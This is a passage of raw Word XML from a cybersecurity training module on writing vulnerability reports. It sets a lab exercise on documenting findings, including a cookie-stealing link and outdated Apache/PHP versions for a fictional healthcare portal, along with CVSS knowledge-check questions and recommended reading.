              <w:t xml:space="preserve"> sess</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>ion cookie from test account. Tested in Chrome and Firefox. An attacker could send a crafted link to a patient that steals their session and takes over their account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Raw Finding #3 — Provide to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458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40" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Raw Notes:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Server response headers reveal: Server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>: Apache/2.2.34, X-Powered-By: PHP/5.6.40. Both versions are end-of-life with multiple known critical CVEs. Apache 2.2.34 has CVE-2017-7679 (buffer overflow) and CVE-2017-9798 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Optionsbleed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">). No exploitation was attempted as this was out of scope, but the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>exposure is significant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Part A — Document Each Finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Using the vulnerability finding template, write a complete professional finding for each of the 3 raw notes above</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>For each finding: write a clear title, calculate a CVSS score and provide the vector string, write a technical description, write a business impact statement (healthcare context — think HIPAA), write full steps to reproduce, list evidence placeholders, and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> write specific remediation guidance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Use the CVSS calculator at https://www.first.org/cvss/calculator/3.1 for each finding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Part B — Write the Executive Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Write a one-page executive summary for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>MindGigs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> Healthcare portal assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Include: overall risk assessment, the three most critical findings with plain-language descriptions, top 5 priority remediation actions, and a positive statement about what the organization is doing well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Your executive summary must be written so that a non</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>-technical healthcare executive can understand it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> no technical jargon without explanation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Part C — Compile the Full Report:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Assemble all sections into a complete, formatted report document: cover page, executive summary, scope (use the lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>scenario as scope), findings summary table (3 findings with severity counts), all three individual findings, a remediation roadmap with priority order and timeframes, and at least one appendix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Format consistently</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> same fonts, heading styles, severity colo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>r coding throughout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The final report should be professionally presentable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> imagine it is being sent to a real client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Assessment &amp; Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004610F1" w:rsidRDefault="004610F1" w:rsidP="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Knowledge Check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1" w:rsidP="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What is the difference between the executive summary and the technical findings section of a vulnerability report? Who reads each?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>alculate the CVSS score for this scenario: An attacker on the same network can exploit a vulnerability without authenticatio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>n and without user interaction. The scope is unchanged. The impact is high confidentiality loss, no integrity impact, and no availability impact. What is the score? Write the vector string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>A developer asks you why you rated a finding Medium when 'it requi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>res them to be logged in.' Explain how authentication requirements affect CVSS scoring and why a Medium rating may still be justified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What are the key elements of responsible disclosure? Why is the 90-day standard important?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Rewrite this poorly-written fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>nding description professionally: 'We found that the website has SQL injection which is really bad and hackers can get in and steal stuff from the database.'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>What is the difference between a CVSS score of 9.8 and a High business risk? Give an example where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> a 9.8 might represent lower business risk than a 6.5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Lab Submission</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Students must submit the following for evaluation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Three complete vulnerability findings (one per raw note) using the full template — including title, CVSS score with vector string, description, business impact, steps to reproduce, evidence placeholders, and remediation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>A professional executive summary wri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>tten for a non-technical healthcare executive audience</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>A complete, formatted vulnerability report compiling all sections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Self-assessment: For each finding, identify one thing you would improve if you had more time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004610F1" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Additional Resources &amp; Reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Recommende</w:t>
      </w:r>
      <w:r>
        <w:t>d Reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The Web Application Hacker's Handbook — Comprehensive coverage of web vulnerabilities and documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Penetration Testing by Georgia Weidman — Includes sample reports and professional documentation standards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Bug Bounty </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Bootcamp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> by Vickie Li — E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>xcellent coverage of writing effective bug bounty reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Online Resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>CVSS v3.1 Calculator — https://www.first.org/cvss/calculator/3.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>CVSS v3.1 Specification — https://www.first.org/cvss/specification-document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>OWASP Testing Guide — https://owasp.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>HackerOne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disclosure Guidelines — https://www.hackerone.com/disclosure-guidelines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Google Project Zero Disclosure Policy — https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-faq.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Sample Pentest Rep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>orts (Public) — https://github.com/juliocesarfort/public-pentesting-reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Tools for Report Writing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Dradis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework — https://dradisframework.com — Purpose-built security reporting and collaboration tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>PlexTrac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Commercial reporting platform used by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">professional </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> teams</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Serpico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://github.com/SerpicoProject/Serpico — Open source penetration testing report generation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Ghostwriter — https://github.com/GhostManager/Ghostwriter — Pentest report management platform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="8" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MindGigs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cybersecurity </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Training  •</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Module 18: Vulnerability Reporting &amp; Documentation Basics  •  Phase 4 of 5</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BB45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D41BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58EE0A76"/>
    <w:lvl w:ilvl="0" w:tplc="9D322B06">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
